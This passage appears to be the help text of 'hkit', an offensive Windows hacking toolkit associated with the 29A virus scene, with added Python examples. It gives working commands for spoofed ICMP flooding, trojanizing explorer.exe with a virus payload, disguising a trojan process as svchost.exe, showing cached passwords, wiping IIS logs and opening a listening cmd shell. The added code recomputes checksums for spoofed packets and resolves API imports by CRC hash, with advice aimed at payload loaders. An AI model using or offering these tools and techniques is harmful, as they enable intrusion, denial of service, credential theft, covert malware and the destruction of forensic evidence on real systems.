29a-7.006
the service.
Use "hkit /service /boottype ServiceName /auto|demand|boot|system|disabled"
to change service boot type.
3. Packet-related (crcpkt & spoofer)
Use "hkit /crcpkt packetfile" to recalculate the IP/ICMP/UDP/TCP checksum(s) of
the specified file, which contains a raw IP packet.
Use "hkit /spoofer packetfile [ntimes|0=infinite] [dst_ip]" to send that
packetfile to some IP.
If <dst_ip> is not specified, the address is taken from
the IP_header.Dst_IP field.
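What "/crcpkt" has to do is recompute the RFC 1071 one's-complement checksums of the packet. The following is an added Python example written for this page, not hkit's code: it walks an IPv4 packet held in memory, zeroes each checksum field, recomputes the IP header checksum, and then the ICMP checksum or the TCP/UDP checksum over its pseudo-header. The ICMP and UDP packets at the bottom are constructed here with zeroed checksum fields, so they are what a hand-edited "packetfile" would look like before running the tool.

```python
"""Recompute IPv4/ICMP/UDP/TCP checksums over a raw packet, as "/crcpkt" does.
Added example, not hkit code. RFC 1071 one's-complement arithmetic throughout."""
import struct

PROTO_ICMP, PROTO_TCP, PROTO_UDP = 1, 6, 17


def checksum(data: bytes) -> int:
    """RFC 1071: 16-bit one's-complement sum, then complement. Odd length is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _layout(pkt):
    """Return (header_len, total_len, protocol) from the IPv4 header."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack_from("!H", pkt, 2)[0]
    return ihl, total_len, pkt[9]


def _pseudo_header(pkt, proto: int, seg_len: int) -> bytes:
    """TCP/UDP checksums also cover src/dst address, protocol and segment length."""
    return bytes(pkt[12:20]) + struct.pack("!BBH", 0, proto, seg_len)


def fix_checksums(pkt: bytes) -> bytes:
    """Return a copy of the packet with the IP header and transport checksums recomputed."""
    pkt = bytearray(pkt)
    ihl, total_len, proto = _layout(pkt)
    # IP header checksum covers the header only; the field must be zero while summing.
    pkt[10:12] = b"\x00\x00"
    struct.pack_into("!H", pkt, 10, checksum(bytes(pkt[:ihl])))
    seg = pkt[ihl:total_len]
    if proto == PROTO_ICMP:
        seg[2:4] = b"\x00\x00"
        struct.pack_into("!H", seg, 2, checksum(bytes(seg)))
    elif proto in (PROTO_TCP, PROTO_UDP):
        off = 16 if proto == PROTO_TCP else 6  # checksum field offset within the segment
        seg[off:off + 2] = b"\x00\x00"
        c = checksum(_pseudo_header(pkt, proto, len(seg)) + bytes(seg))
        if proto == PROTO_UDP and c == 0:
            c = 0xFFFF                        # UDP: 0 on the wire means "no checksum"
        struct.pack_into("!H", seg, off, c)
    pkt[ihl:total_len] = seg
    return bytes(pkt)


def checksums_valid(pkt: bytes) -> bool:
    """A correct checksum makes the complemented sum over the covered bytes come out 0."""
    ihl, total_len, proto = _layout(pkt)
    if checksum(pkt[:ihl]) != 0:
        return False
    seg = pkt[ihl:total_len]
    if proto == PROTO_ICMP:
        return checksum(seg) == 0
    if proto in (PROTO_TCP, PROTO_UDP):
        return checksum(_pseudo_header(pkt, proto, len(seg)) + seg) == 0
    return True


# Constructed samples (not captured traffic): checksum fields deliberately zero.
ICMP_ECHO_BAD = bytes.fromhex(
    "4500001c 00010000 4001 0000 c0a80001 c0a80002"   # IPv4, proto 1, 192.168.0.1 -> .2
    "0800 0000 1234 0001"                             # ICMP echo request, id 0x1234 seq 1
)
UDP_DNS_BAD = bytes.fromhex(
    "45000020 00020000 4011 0000 c0a80001 c0a80002"   # IPv4, proto 17
    "04d2 0035 000c 0000 61626364"                    # UDP 1234 -> 53, len 12, payload "abcd"
)

if __name__ == "__main__":
    for name, bad in (("icmp", ICMP_ECHO_BAD), ("udp", UDP_DNS_BAD)):
        good = fix_checksums(bad)
        print(name, checksums_valid(bad), "->", checksums_valid(good), good.hex())
```

The UDP special case matters when building spoofed packets: a computed checksum of 0 has to be sent as 0xFFFF, because 0 in the UDP header tells the receiver no checksum was supplied. IP options (IHL > 5) are covered because the header length is read from the packet rather than assumed to be 20.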
4. Sniffer
Use "hkit /sniffer outfile|basepath|NULL [option(s)]" to invoke
the raw-socket sniffer.
If "NULL" is specified as the output file name, no output file(s)
are generated.
If "/1" is specified within the options, a single file is written.
Otherwise a directory with several sub-directories is created,
containing many files.
You can specify "/input=<infile>" to tell the sniffer that input packets
should be taken from a file, not from the network.
This can be a previously sniffed file, or a SNORT'ed file (then use "/insnort").
Broken snort'ed files are repaired.
If "/1" is NOT specified, you can use "/r" to write TCP sessions
as single files, instead of writing one file per packet.
Here "/s" can also be specified, to skip IP headers.
Each TCP session is written as two files: input and output data.
When processing (reading/writing) files,
use "/rt", "/wt", "/rl", "/wl" to read/write packet Timestamp and/or Length.
NOTE: if you specified "/wt" and/or "/wl" when sniffing,
you should specify the same "/rt" and/or "/rl" combination
when reading the corresponding file.
Use "/tcp|udp|icmp+|-" to include/exclude protocols.
For example, "/tcp-" will exclude tcp from being sniffed,
while using "/udp+ /icmp+" will sniff ONLY udp and icmp.
Use "/ip+|-<ip_mask>" to specify an IP mask to be sniffed.
For example, "/ip-192.168.*.*" will exclude the LAN from being sniffed,
while "/ip+123.*.*.*" will sniff ONLY the specified range.
Up to 1024 IP masks/addresses can be specified.
Use "/v" to verbosely dump sniffed packets (line per packet).
Use "/ip=<ip>,alias" to rename IP within dump.
For example: "/ip=192.168.0.1,gateway"
Use "/http" and/or "/dns" to dump http/dns requests/reply details.
Use "/log=logfile" to write dump into log file.
Use "/f" to flush files after each write operation.
Options can also be specified in the following locations:
- current_directory\hkit.cfg
- path:\<argv0>.cfg
- command line
To sniff & see packet info in the console:
"hkit /sniffer null /v /http /dns"
To sniff into single file, use:
"hkit /sniffer sniffed.bin /1 /wl /wt"
To re-process sniffed file, use:
"hkit /sniffer /input=sniffed.bin /rl /rt sniffed2.bin /v"
To sniff in 1packet-->1file mode, use:
"hkit /sniffer sniffed /v"
To sniff in 1packet-->1file mode, but merge tcp sessions:
"hkit /sniffer sniffed /v /r /s"
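The protocol and IP-mask switches above have include/exclude semantics that are easy to get wrong when mixing them: a "-" always drops, and a single "+" turns the filter into an allow-list. The following added Python model (written for this page, not hkit's code) parses a sniffer option list into such a filter and applies it to a packet's protocol and addresses. It assumes an IP mask matches when either the source or the destination address matches, which the help text does not spell out, and it enforces the stated limit of 1024 masks.

```python
"""Include/exclude semantics of hkit's sniffer filter options ("/tcp-", "/udp+ /icmp+",
"/ip+123.*.*.*", "/ip-192.168.*.*"). Added example modelling the help text, not hkit code.
Assumption: an IP mask matches if EITHER the source or the destination address matches."""
from dataclasses import dataclass, field
from typing import List, Set

PROTOCOLS = {"tcp": 6, "udp": 17, "icmp": 1}
MAX_IP_MASKS = 1024  # limit stated in the help text


def mask_matches(mask: str, ip: str) -> bool:
    """Octet-wise match; '*' is a wildcard for one octet ("192.168.*.*")."""
    mo, io = mask.split("."), ip.split(".")
    if len(mo) != 4 or len(io) != 4:
        raise ValueError("expected dotted quad: %r / %r" % (mask, ip))
    return all(m == "*" or m == i for m, i in zip(mo, io))


@dataclass
class SnifferFilter:
    proto_include: Set[int] = field(default_factory=set)
    proto_exclude: Set[int] = field(default_factory=set)
    ip_include: List[str] = field(default_factory=list)
    ip_exclude: List[str] = field(default_factory=list)

    def accepts(self, proto: int, src: str, dst: str) -> bool:
        # Protocols: "-" always drops; any "+" switches to allow-list mode.
        if proto in self.proto_exclude:
            return False
        if self.proto_include and proto not in self.proto_include:
            return False
        # Addresses: "/ip-" drops matching traffic; any "/ip+" means ONLY the listed ranges.
        if any(mask_matches(m, src) or mask_matches(m, dst) for m in self.ip_exclude):
            return False
        if self.ip_include and not any(
            mask_matches(m, src) or mask_matches(m, dst) for m in self.ip_include
        ):
            return False
        return True


def parse_filter(options) -> SnifferFilter:
    """Pull the protocol and IP-mask switches out of a sniffer option list.
    Other options ("/v", "/1", "/ip=<ip>,alias", ...) are ignored here."""
    f = SnifferFilter()
    for opt in options:
        low = opt.lower()
        if len(low) < 2:
            continue
        name, sign = low[:-1].lstrip("/"), low[-1]
        if name in PROTOCOLS and sign in "+-":
            target = f.proto_include if sign == "+" else f.proto_exclude
            target.add(PROTOCOLS[name])
        elif low.startswith("/ip+") or low.startswith("/ip-"):
            target = f.ip_include if low[3] == "+" else f.ip_exclude
            target.append(opt[4:])
    if len(f.ip_include) + len(f.ip_exclude) > MAX_IP_MASKS:
        raise ValueError("at most %d IP masks/addresses" % MAX_IP_MASKS)
    return f


if __name__ == "__main__":
    flt = parse_filter(["/udp+", "/icmp+", "/ip-192.168.*.*", "/v", "/dns"])
    for proto, src, dst in ((17, "10.0.0.1", "8.8.8.8"), (6, "10.0.0.1", "8.8.8.8"),
                            (17, "192.168.0.5", "8.8.8.8")):
        print(proto, src, "->", dst, flt.accepts(proto, src, dst))
```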
5. ICMP Pinger/Scanner/Spoofer/Flooder
Use "hkit /ping <ip|host> -n count" to ping host count times.
The specified IP is the destination IP written into the sent packet.
Use "-pktsrc addr" to specify source IP written into packet.
Use "-intsrc addr" to specify source interface IP.
Use "-intdst addr" to specify destination interface IP.
Use "-l size" to specify ping's payload size.
Use "-nw" to force flood mode -- i.e. don't wait for replies.
Use "-w timeout" to specify pong wait timeout, in milliseconds.
Use "-scan -n count" to scan count hosts, starting from the specified IP.
Use "-fastscan" instead of "-scan" to use parallel scanner
(two threads - sending and receiving).
Pinger: "hkit /ping www.microsoft.com"
Scanner: "hkit /ping www.microsoft.com -fastscan -n 256 -w 10000"
Spoofer/Flooder: "hkit /ping www.microsoft.com -pktsrc fuck.org -nw -n 0"
6. Registry
Use "hkit /reg /dumpall" to save all accessible data into a
regedit-compatible file.
Use "hkit /reg keyword(s)" to search for at least one keyword
within each processed key/value/data set.
Use "hkit /reg /all keyword(s)" to search for ALL keywords
within each processed key/value/data set.
Options:
Use "/key-", "/data-", "/value-" to disable searching within key/data/value.
Use "/c" to enable case-sensitive search.
Use "/findascii" to search ONLY within ascii data format.
Use "/findunicode" to search ONLY within unicode data format.
Use "/outfile=filename" to change output file from hkit.reg to filename.
Use "/outunicode" to force REGEDIT5-compatible output format.
(default is ascii, REGEDIT4-compatible)
Use "/text-" to disable the ASCII comments accompanying the hex data dump.
Use "/fillout" to fill output data with X'es or 0's.
This is useful to wipe specified registry keys.
Example: "hkit /reg /outfile=con icq"
7. Disassembler/trojanizer (previously REVERT tool, MISTFALL-based)
Use "hkit /revert explorer.exe explorer2.exe --mode=virus:abc
--virus-va:00401234"
The example means: disassemble explorer.exe, insert the binary file 'abc'
at address 401234, and link it all into the new file explorer2.exe.
8. Binary --> source/echo conversion
Use "hkit /bin2src /asm|pas|cpp 123.bin" to produce 123.inc containing
"DB 55,66,77,..."-like statements.
Use "hkit /bin2src /bin|asm|pas|cpp 123.bin /S=$START$ /E=$END$ @txt"
to search for '$START$'/'$END$' signatures within 123.bin,
and write everything between them as an array named 'txt'
into 123.bin|ash|inc|cpp-file.
Use "hkit /bin2bat somefile.exe batfile.bat targetfile.exe"
to produce batfile.bat from somefile.exe,
which, when executed, constructs targetfile.exe.
The source file is split into 64k blocks, each of which is
packed and converted into a self-extracting ASCII .com file.
The resulting .bat file ECHOes and RUNs these .com files,
and then appends the resulting 64k blocks to targetfile.exe using 'copy /b'.
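The /bin2src conversion described above (signature-delimited extraction followed by emission as asm DB lines, a Pascal array or a C/C++ array) is small enough to show completely. The following Python is an added example written for this page, not hkit's code: the exact line layout hkit produces is not documented, so the formats here are assumptions, and the sample blob with $START$/$END$ markers is constructed.

```python
"""Binary -> source conversion in the spirit of "hkit /bin2src": emit a byte array as
asm DB lines, a Pascal const array or a C/C++ array, optionally only the bytes between
$START$/$END$ signatures. Added example, not hkit code; hkit's exact output layout is unknown."""


def extract_between(data: bytes, start_sig: bytes, end_sig: bytes) -> bytes:
    """Return the bytes strictly between the first start_sig and the next end_sig after it."""
    s = data.find(start_sig)
    if s < 0:
        raise ValueError("start signature %r not found" % start_sig)
    s += len(start_sig)
    e = data.find(end_sig, s)
    if e < 0:
        raise ValueError("end signature %r not found after start" % end_sig)
    return data[s:e]


def to_source(data: bytes, fmt: str, name: str = "txt", per_line: int = 16) -> str:
    """fmt is one of 'asm', 'pas', 'cpp'; rows of per_line bytes keep the output diffable."""
    if not data:
        raise ValueError("nothing to convert")
    rows = [data[i:i + per_line] for i in range(0, len(data), per_line)]
    if fmt == "asm":
        body = [" DB " + ",".join(str(b) for b in row) for row in rows]   # decimal, like "DB 55,66,77"
        return "\n".join(["%s LABEL BYTE" % name] + body) + "\n"
    if fmt == "pas":
        body = ",\n".join("  " + ",".join("$%02X" % b for b in row) for row in rows)
        return "const %s: array[0..%d] of byte = (\n%s);\n" % (name, len(data) - 1, body)
    if fmt == "cpp":
        body = ",\n".join("  " + ",".join("0x%02X" % b for b in row) for row in rows)
        return "unsigned char %s[%d] = {\n%s\n};\n" % (name, len(data), body)
    raise ValueError("unknown format %r" % fmt)


def bin2src(data: bytes, fmt: str, name: str = "txt", start=None, end=None):
    """Whole-file or signature-delimited conversion; fmt 'bin' returns the raw slice."""
    if (start is None) != (end is None):
        raise ValueError("/S and /E must be given together")
    if start is not None:
        data = extract_between(data, start, end)
    if fmt == "bin":
        return data
    return to_source(data, fmt, name)


# Constructed input: a few bytes of filler around a marked 4-byte code stub.
SAMPLE = b"MZ\x90\x00filler$START$\x31\xc0\x50\xc3$END$trailer"

if __name__ == "__main__":
    for fmt in ("asm", "pas", "cpp"):
        print(bin2src(SAMPLE, fmt, "stub", start=b"$START$", end=b"$END$"))
```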
9. FakeExec
This is a new (and EXPERIMENTAL !!!) technique allowing you
to fake an [existing] process's file name or pid.
As a result, NtQuerySystemInformation (taskmgr) and psapi (module list)
return something like svchost.exe, while the process actually executed is
some trojan.exe.
It is very complex stuff: it patches the PEB
in the corresponding process's context, patches system structures
through the PhysicalMemory device, and besides that enters ring0,
all of which is complicated by internal structure mismatches
between the 2K and XP systems.
So you should understand that in some cases it doesn't work,
and in other cases it can crash the system ;-)
It is executed as follows:
"hkit /fakeexec notepad.exe calc.exe" -- exec notepad and change name to calc
"hkit /fakeexec bsodomon.exe 31337" -- exec process and change pid to 31337
"hkit /fakeexec 666 31337" -- find process with pid=666 and set pid to 31337
"hkit /fakeexec 666 svchost.exe" -- find process with pid=666 and change name
WARNING!
When a process's pid is changed, the system will (in most cases)
BSOD when that process exits.
10. API<-->CRC conversion
Use "hkit /crc /dll2crc kernel32.dll" to dump crc for each exported api.
Use "hkit /crc /dll2api kernel32.dll View" to find all exported functions
containing word "View" and corresponding crcs.
Use "hkit /crc /api2crc CreateFileA" to calculate crc32 for "CreateFileA".
Use "hkit /crc /crc2api kernel32.dll A89B382F" to find exported function with
specified crc32.
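The four /crc sub-commands are the two directions of the same import-by-hash table: hash every export name once, then resolve a hash back to a name (or spot that two names collide, which would make crc2api ambiguous). The following Python is an added example written for this page, not hkit's code. It assumes the standard reflected CRC-32 (polynomial 0xEDB88320, initial value and final XOR 0xFFFFFFFF, the same as zlib); the help text does not state which CRC variant hkit uses, so hkit's printed values may differ. The export list is constructed, not read from kernel32.dll.

```python
"""API name <-> CRC32 resolution as done by "hkit /crc" (dll2crc, dll2api, api2crc, crc2api).
Added example, not hkit code. Standard reflected CRC-32 (poly 0xEDB88320, init and final
XOR 0xFFFFFFFF, as in zlib) is assumed. EXPORTS below is constructed, not a real export table."""
import zlib
from typing import Dict, List, Tuple


def _make_table() -> List[int]:
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _make_table()


def crc32(data: bytes) -> int:
    """Table-driven CRC-32; the same loop is what import-by-hash shellcode carries inline."""
    c = 0xFFFFFFFF
    for b in data:
        c = _TABLE[(c ^ b) & 0xFF] ^ (c >> 8)
    return c ^ 0xFFFFFFFF


def api2crc(name: str) -> int:
    """hkit /crc /api2crc <name>"""
    return crc32(name.encode("ascii"))


def dll2crc(exports) -> Dict[int, str]:
    """hkit /crc /dll2crc: crc -> name for every export.
    A collision would make crc2api ambiguous, so refuse to build the table."""
    table: Dict[int, str] = {}
    for name in exports:
        h = api2crc(name)
        if h in table and table[h] != name:
            raise ValueError("CRC collision: %s vs %s (%08X)" % (table[h], name, h))
        table[h] = name
    return table


def crc2api(table: Dict[int, str], crc: int):
    """hkit /crc /crc2api <dll> <crc>: None when no export has that CRC."""
    return table.get(crc)


def dll2api(exports, word: str) -> List[Tuple[str, int]]:
    """hkit /crc /dll2api <dll> <word>: exports whose name contains word, with their CRCs."""
    return [(n, api2crc(n)) for n in exports if word in n]


def self_check() -> bool:
    """Cross-check the hand-rolled CRC against zlib on a few inputs."""
    samples = [b"", b"CreateFileA", b"kernel32.dll", bytes(range(256))]
    return all(crc32(s) == (zlib.crc32(s) & 0xFFFFFFFF) for s in samples)


# Constructed export list (not a real kernel32.dll export table).
EXPORTS = ["CreateFileA", "CreateFileW", "GetProcAddress", "LoadLibraryA",
           "MapViewOfFile", "UnmapViewOfFile", "VirtualAlloc"]

if __name__ == "__main__":
    table = dll2crc(EXPORTS)
    for name, h in dll2api(EXPORTS, "View"):
        print("%-20s %08X -> %s" % (name, h, crc2api(table, h)))
```

When using such hashes to resolve imports in a loader or payload, the collision check is the part that matters: a table built from one DLL version can silently collide with an export added in a later version, so hashes should be checked against every DLL version the code is expected to meet.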
11. Other shit
Use "hkit /showpass" to show cached passwords on NT/2K systems
(based on the PasswordReminder sources).
Use "hkit /md5 file" to calculate file's md5 checksum.
NOTE: the file is treated as BINARY, not as an ASCII file.
Use 'hkit /md5 "phrase"' to calculate phrase's md5 checksum.
Use "hkit /http ip port 10 20 req" to send the file req to ip:port
and then dump the reply, waiting 10 seconds for connect()
and 20 seconds for recv().
Use "hkit /iislog" to clean IIS logs, even if IIS is running now.
Use "hkit /savehkcu hkcu.reg" to save HKEY_CURRENT_USER into hkcu.reg file in
binary form.
Use "hkit /error 187" to show error code's description.
Use "hkit /nterror c0000001" to show nt error's description.
Use "hkit /telnetd ip port" to listen on ip:port for incoming connections,
giving cmd shell. If ip is 0, listens on all addresses.
* * *